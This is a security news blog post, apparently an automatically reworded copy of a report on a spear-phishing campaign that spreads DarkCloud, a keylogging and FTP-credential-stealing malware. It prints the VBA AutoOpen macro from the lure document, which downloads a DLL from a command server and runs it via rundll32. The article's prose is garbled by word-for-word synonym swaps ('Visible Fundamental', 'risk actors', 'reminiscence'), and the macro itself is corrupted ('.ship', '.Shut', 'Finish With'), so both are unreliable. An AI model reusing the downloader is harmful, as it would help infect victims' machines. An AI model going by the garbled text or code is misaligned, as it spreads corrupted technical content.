Skip to content
  • Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form
New Spear-Phishing Attack Delivers DarkCloud Malware to Steal Keystrokes, FTP Credentials and Others

New Spear-Phishing Attack Delivers DarkCloud Malware to Steal Keystrokes, FTP Credentials and Others

Posted on September 29, 2025September 29, 2025 By CWS

A newly noticed spear-phishing marketing campaign is leveraging subtle social engineering lures to distribute DarkCloud, a modular malware suite designed to reap keystrokes, exfiltrate FTP credentials and collect system data.

Over the previous month, focused emails masquerading as legit software program updates or company invoices have reached unsuspecting recipients throughout varied industries.

These messages carry a weaponized Microsoft Phrase attachment that, when opened, triggers a multi-stage an infection chain.

Preliminary reconnaissance signifies that risk actors behind the marketing campaign have invested appreciable effort into crafting plausible messages, demonstrating a excessive degree of operational safety and tradecraft.

Shortly after the sufferer allows macros within the doc, a hidden Visible Fundamental for Functions (VBA) script executes, reaching out to a command-and-control (C2) server to obtain the next-stage payload.

Phishing lure (Supply – eSentire)

This payload, the DarkCloud loader, is able to unpacking further modules instantly into reminiscence, evading disk-based detection and complicating forensic evaluation.

Analysts notice that the loader checks for digital machine artifacts and sandboxing environments, delaying execution or aborting if evaluation instruments are detected.

eSentire researchers recognized DarkCloud’s core keylogging element inside hours of the marketing campaign’s preliminary detection.

They noticed the malware injecting a dynamic-link library into widespread processes akin to explorer.exe and svchost.exe, establishing hooks on keystroke APIs to seize consumer enter.

This strategy ensures that each typed character—together with credentials entered into web-based FTP shoppers—might be intercepted.

The harvested information is then encrypted with a customized XOR-based algorithm and despatched to the C2 infrastructure underneath the guise of legit HTTPS visitors, mixing in with regular community flows.

DarkCloud web site marketed as legit software program (Supply – eSentire)

Apart from credential theft, DarkCloud displays superior reconnaissance capabilities. It gathers system data—akin to operating processes, put in software program, and open community connections—and transmits this metadata again to the attackers.

This enrichment permits the operators to tailor subsequent modules, akin to a distant file exfiltration plugin or a screen-capture element, to the sufferer’s setting.

All through the marketing campaign, the risk actors pivot between modules to maximise information assortment whereas minimizing forensic footprints.

An infection Mechanism and Loader Dynamics

The an infection sequence begins with a lure doc containing an obfuscated VBA macro. Upon activation, the macro executes the next sequence:-

Sub AutoOpen()
Dim xmlHttp As Object
Set xmlHttp = CreateObject(“MSXML2.XMLHTTP”)
xmlHttp.Open “GET”, ” False
xmlHttp.ship
Dim shell As Object
Set shell = CreateObject(“WScript.Shell”)
Dim tempPath As String
tempPath = Environ(“TEMP”) & “dcl.dll”
With CreateObject(“ADODB.Stream”)
.Sort = 1
.Open
.Write xmlHttp.responseBody
.SaveToFile tempPath, 2
.Shut
Finish With
shell.Run “rundll32.exe ” & tempPath & “,EntryPoint”
Finish Sub

As soon as dcl.dll is loaded, it unpacks further modules in reminiscence. The loader makes use of a customized “chunked XOR” routine to decrypt embedded payloads, avoiding dropping executables on disk.

This memory-resident design permits DarkCloud to take care of persistence through a registry run key, whereas its modular structure helps on-demand deployment of latest capabilities.

By combining a convincing spear-phishing vector with a stealthy, in-memory loader and modular plugins, DarkCloud poses a big risk to organizations that depend on FTP-based file transfers and unified endpoint safety options.

Safety groups ought to monitor irregular HTTPS classes to unknown hosts and make use of behavioral evaluation instruments able to detecting API hook injections. Steady risk intelligence sharing and fast incident response will likely be essential to mitigating DarkCloud’s evolving ways.

Comply with us on Google Information, LinkedIn, and X to Get Extra Prompt Updates, Set CSN as a Most well-liked Supply in Google.

Cyber Security News Tags:Attack, Credentials, DarkCloud, Delivers, FTP, Keystrokes, Malware, SpearPhishing, Steal

Post navigation

Previous Post: SVG Security Analysis Toolkit to Detect Malicious Scripts Hidden in SVG files
Next Post: EvilAI Malware Masquerades as AI Tools to Infiltrate Global Organizations

Related Posts

CyberVolk Ransomware Attacking Windows System in Critical Infrastructure and Scientific Institutions CyberVolk Ransomware Attacking Windows System in Critical Infrastructure and Scientific Institutions Cyber Security News
Hackers Attacking MongoDB Instances to Delete Database and Add Ransom Note Hackers Attacking MongoDB Instances to Delete Database and Add Ransom Note Cyber Security News
ZYXEL Authorization Bypass Vulnerability Let Attackers View and Download System Configuration ZYXEL Authorization Bypass Vulnerability Let Attackers View and Download System Configuration Cyber Security News
Akira Ransomware Uses Windows Drivers to Bypass AV/EDR in SonicWall Attacks Akira Ransomware Uses Windows Drivers to Bypass AV/EDR in SonicWall Attacks Cyber Security News
SideWinder Hacking Group Uses ClickOnce-Based Infection Chain to Deploy StealerBot Malware SideWinder Hacking Group Uses ClickOnce-Based Infection Chain to Deploy StealerBot Malware Cyber Security News
Attackers are Using WSL2 as a Stealthy Hideout Inside Windows Systems Attackers are Using WSL2 as a Stealthy Hideout Inside Windows Systems Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • Russian Group Star Blizzard Utilizes DarkSword iOS Exploit
  • Secrets Sprawl Expands in 2026: Key Insights for CISOs
  • Urgent Patches Address Critical Grafana Security Flaws
  • Telnyx Python SDK Faces Supply Chain Attack
  • Russian Toolkit Exploits RDP via Malicious LNK Files

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • March 2026
  • February 2026
  • January 2026
  • December 2025
  • November 2025
  • October 2025
  • September 2025
  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • Russian Group Star Blizzard Utilizes DarkSword iOS Exploit
  • Secrets Sprawl Expands in 2026: Key Insights for CISOs
  • Urgent Patches Address Critical Grafana Security Flaws
  • Telnyx Python SDK Faces Supply Chain Attack
  • Russian Toolkit Exploits RDP via Malicious LNK Files

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Copyright © 2026 Cyber Web Spider Blog – News.

Powered by PressBook Masonry Dark